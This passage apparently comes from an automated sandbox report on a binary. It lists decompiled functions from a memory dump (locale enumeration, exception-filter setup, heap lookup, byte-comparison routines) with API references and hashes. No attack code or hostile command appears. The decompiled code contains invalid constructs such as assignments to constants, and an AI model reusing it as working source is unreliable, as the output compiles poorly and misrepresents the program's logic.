                                        • Instruction Fuzzy Hash: E8022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106771D, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0106771D(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x10c1af8; // 0x7c098ad9
				_t6 = _t5 ^  *0x107ece0;
				if(_t6 == 0) {
					 *0x10c071c = _a4;
					_t8 = EnumSystemLocalesW(E01067709, 1);
					 *0x10c071c =  *0x10c071c & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}






                                        0x01067720
                                        0x01067725
                                        0x0106772b
                                        0x01067746
                                        0x0106774b
                                        0x01067751
                                        0x01067759
                                        0x0106772d
                                        0x0106773b
                                        0x0106773b

                                        APIs
                                        • EnumSystemLocalesW.KERNEL32(01067709,00000001,?,0106DCD2,0106DD70,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0106774B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: 02642ee0af8d2194d9e80fe7cf7c2612d0b52ab69b81bed0aa5c708164a802ff
                                        • Instruction ID: 08fa725976e8c9b7c7e836c7f35d38734c3431e7895eef128108ade3208f0ee2
                                        • Opcode Fuzzy Hash: 02642ee0af8d2194d9e80fe7cf7c2612d0b52ab69b81bed0aa5c708164a802ff
                                        • Instruction Fuzzy Hash: EAE04636550308EFEF228FE5EC86B583BA8FB04714F008001F68C6A488C2BAA1619F84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010677A3, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,01064744,?,?,?,00000002), ref: 010677CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 2d8fc9e6ce2a6c4b6fbe662e196d20152ced5e9862cc86e73ace40b2c775470a
                                        • Instruction ID: 27394f0fd830ac51aeb88bbf358164226f9e632be2abc6c2d1cae60a3bdec0ee
                                        • Opcode Fuzzy Hash: 2d8fc9e6ce2a6c4b6fbe662e196d20152ced5e9862cc86e73ace40b2c775470a
                                        • Instruction Fuzzy Hash: F0D01736000109BFDF12AFE4E809CAA3BADFB0C2A8B004841FA5C45010DA3BA9209F61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010630B6, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E010630B6(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                        0x010630c3

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,010612D0,01061285), ref: 010630BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: c599966d1c0e0a6030a56d4122a15cf81d869bd5fe84531652bc84c2809425b5
                                        • Instruction ID: 56ada2ff6d5fe4cd823db073f6dc30e1dea839514018f2493c7225d2b2027cc5
                                        • Opcode Fuzzy Hash: c599966d1c0e0a6030a56d4122a15cf81d869bd5fe84531652bc84c2809425b5
                                        • Instruction Fuzzy Hash: B2A0243040010CF7CF111F41FC0D4447F1CD700170700C011F50C00011D733541047D4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010B0AC0, Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3r+
                                        • API String ID: 0-2693420309
                                        • Opcode ID: 9ae43399c64a0b4bf6b4df5803c6c8c3f7c851cefd63560c9e7cb293acac0bb5
                                        • Instruction ID: 495c9c9a3dfb3cf19f13f072d9446c8a4d34f9e4015183c5ef3b540efcdd50cf
                                        • Opcode Fuzzy Hash: 9ae43399c64a0b4bf6b4df5803c6c8c3f7c851cefd63560c9e7cb293acac0bb5
                                        • Instruction Fuzzy Hash: 1A915373919799CFE726DF38D88AB823FB5F352720B48428ED5A1834E5D734211ACB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01082365, Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
                                        • Instruction ID: ce2077f0029f5679bf4c484f332dd2e4097b98dbcb468acc4f85be0693ff29b4
                                        • Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
                                        • Instruction Fuzzy Hash: 8251ACB1D09208CFEB55DFA9DA8569EBBF4FB48310F10C1AAD886E7250D370A910CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061DB2, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E01061DB2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x10bfd1c = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                        0x01061db2
                                        0x01061dba
                                        0x01061dc6

                                        APIs
                                        • GetProcessHeap.KERNEL32(0106111B,0107CCC0,00000014), ref: 01061DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 851f63f8c657e3f06390e2360d8b4149d209fa4b0fe54428fd2cfee73ce730f0
                                        • Instruction ID: 0579c7b4c40002059ceaaa0089085136548b822ccb6dd3145684b1fa800b9dbe
                                        • Opcode Fuzzy Hash: 851f63f8c657e3f06390e2360d8b4149d209fa4b0fe54428fd2cfee73ce730f0
                                        • Instruction Fuzzy Hash: 69B012B07015034747590F3A7C681C935E56708201350807F7043D3184DF25C5109F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010952E0, Relevance: .4, Instructions: 435COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                        • Instruction ID: 7f2a05828298c0ca4935aba40f6484586434cae658bbe08255592e4c1fe9fd02
                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                        • Instruction Fuzzy Hash: 76025E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106B933, Relevance: .3, Instructions: 345COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106B933(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                        0x0106b933
                                        0x0106b933
                                        0x0106b939
                                        0x0106b9c0
                                        0x0106b9c2
                                        0x0106b9c4
                                        0x00000000
                                        0x00000000
                                        0x0106b9ca
                                        0x0106b9d0
                                        0x0106ba57
                                        0x0106ba59
                                        0x0106ba5b
                                        0x00000000
                                        0x00000000
                                        0x0106ba61
                                        0x0106ba67
                                        0x0106baee
                                        0x0106baf0
                                        0x0106baf2
                                        0x00000000
                                        0x00000000
                                        0x0106baf8
                                        0x0106bafe
                                        0x0106bb85
                                        0x0106bb87
                                        0x0106bb89
                                        0x00000000
                                        0x00000000
                                        0x0106bb8f
                                        0x0106bb95
                                        0x0106bc1c
                                        0x0106bc1e
                                        0x0106bc20
                                        0x00000000
                                        0x00000000
                                        0x0106bc2c
                                        0x0106bcb4
                                        0x0106bcb6
                                        0x0106bcb8
                                        0x00000000
                                        0x00000000
                                        0x0106bcbe
                                        0x0106bcc4
                                        0x0106bd4b
                                        0x0106bd4d
                                        0x0106bd4f
                                        0x0106bd4f
                                        0x00000000
                                        0x0106bd4f
                                        0x0106bcd1
                                        0x0106bcd3
                                        0x0106bceb
                                        0x0106bcf3
                                        0x0106bcf5
                                        0x0106bd0d
                                        0x0106bd15
                                        0x0106bd17
                                        0x0106bd2f
                                        0x0106bd37
                                        0x0106bd39
                                        0x0106bd42
                                        0x0106bd42
                                        0x00000000
                                        0x0106bd39
                                        0x0106bd20
                                        0x0106bd29
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bd29
                                        0x0106bcfe
                                        0x0106bd07
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bd07
                                        0x0106bcdc
                                        0x0106bce5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bce5
                                        0x0106bc3a
                                        0x0106bc3c
                                        0x0106bc54
                                        0x0106bc5c
                                        0x0106bc5e
                                        0x0106bc76
                                        0x0106bc7e
                                        0x0106bc80
                                        0x0106bc98
                                        0x0106bca0
                                        0x0106bca2
                                        0x0106bcab
                                        0x0106bcab
                                        0x00000000
                                        0x0106bca2
                                        0x0106bc89
                                        0x0106bc92
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bc92
                                        0x0106bc67
                                        0x0106bc70
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bc70
                                        0x0106bc45
                                        0x0106bc4e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bc4e
                                        0x0106bba2
                                        0x0106bba4
                                        0x0106bbbc
                                        0x0106bbc4
                                        0x0106bbc6
                                        0x0106bbde
                                        0x0106bbe6
                                        0x0106bbe8
                                        0x0106bc00
                                        0x0106bc08
                                        0x0106bc0a
                                        0x0106bc13
                                        0x0106bc13
                                        0x00000000
                                        0x0106bc0a
                                        0x0106bbf1
                                        0x0106bbfa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bbfa
                                        0x0106bbcf
                                        0x0106bbd8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bbd8
                                        0x0106bbad
                                        0x0106bbb6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bbb6
                                        0x0106bb0b
                                        0x0106bb0d
                                        0x0106bb25
                                        0x0106bb2d
                                        0x0106bb2f
                                        0x0106bb47
                                        0x0106bb4f
                                        0x0106bb51
                                        0x0106bb69
                                        0x0106bb71
                                        0x0106bb73
                                        0x0106bb7c
                                        0x0106bb7c
                                        0x00000000
                                        0x0106bb73
                                        0x0106bb5a
                                        0x0106bb63
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bb63
                                        0x0106bb38
                                        0x0106bb41
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bb41
                                        0x0106bb16
                                        0x0106bb1f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bb1f
                                        0x0106ba74
                                        0x0106ba76
                                        0x0106ba8e
                                        0x0106ba96
                                        0x0106ba98
                                        0x0106bab0
                                        0x0106bab8
                                        0x0106baba
                                        0x0106bad2
                                        0x0106bada
                                        0x0106badc
                                        0x0106bae5
                                        0x0106bae5
                                        0x00000000
                                        0x0106badc
                                        0x0106bac3
                                        0x0106bacc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bacc
                                        0x0106baa1
                                        0x0106baaa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106baaa
                                        0x0106ba7f
                                        0x0106ba88
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106ba88
                                        0x0106b9dd
                                        0x0106b9df
                                        0x0106b9f7
                                        0x0106b9ff
                                        0x0106ba01
                                        0x0106ba19
                                        0x0106ba21
                                        0x0106ba23
                                        0x0106ba3b
                                        0x0106ba43
                                        0x0106ba45
                                        0x0106ba4e
                                        0x0106ba4e
                                        0x00000000
                                        0x0106ba45
                                        0x0106ba2c
                                        0x0106ba35
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106ba35
                                        0x0106ba0a
                                        0x0106ba13
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106ba13
                                        0x0106b9e8
                                        0x0106b9f1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b93f
                                        0x0106b93f
                                        0x0106b946
                                        0x0106b948
                                        0x0106b960
                                        0x0106b960
                                        0x0106b968
                                        0x0106b96a
                                        0x0106b982
                                        0x0106b982
                                        0x0106b98a
                                        0x0106b98c
                                        0x0106b9a4
                                        0x0106b9a4
                                        0x0106b9ac
                                        0x0106b9ae
                                        0x0106b9b7
                                        0x0106b9b7
                                        0x00000000
                                        0x0106b9ae
                                        0x0106b992
                                        0x0106b995
                                        0x0106b99e
                                        0x0106b4f6
                                        0x0106b4f6
                                        0x0106c2e7
                                        0x0106c2e7
                                        0x00000000
                                        0x0106b99e
                                        0x0106b970
                                        0x0106b973
                                        0x0106b97c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b97c
                                        0x0106b94e
                                        0x0106b951
                                        0x0106b95a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b95a

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: 8f497d623201cdbb83a7236413e20052a56ac83402389db93955ff8c36b34b9a
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 2AC164B23051930AEFAE463E857443FBEE95A916B131A179DD8F3CB1D6FE20C124C620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106BD68, Relevance: .3, Instructions: 341COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106BD68(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
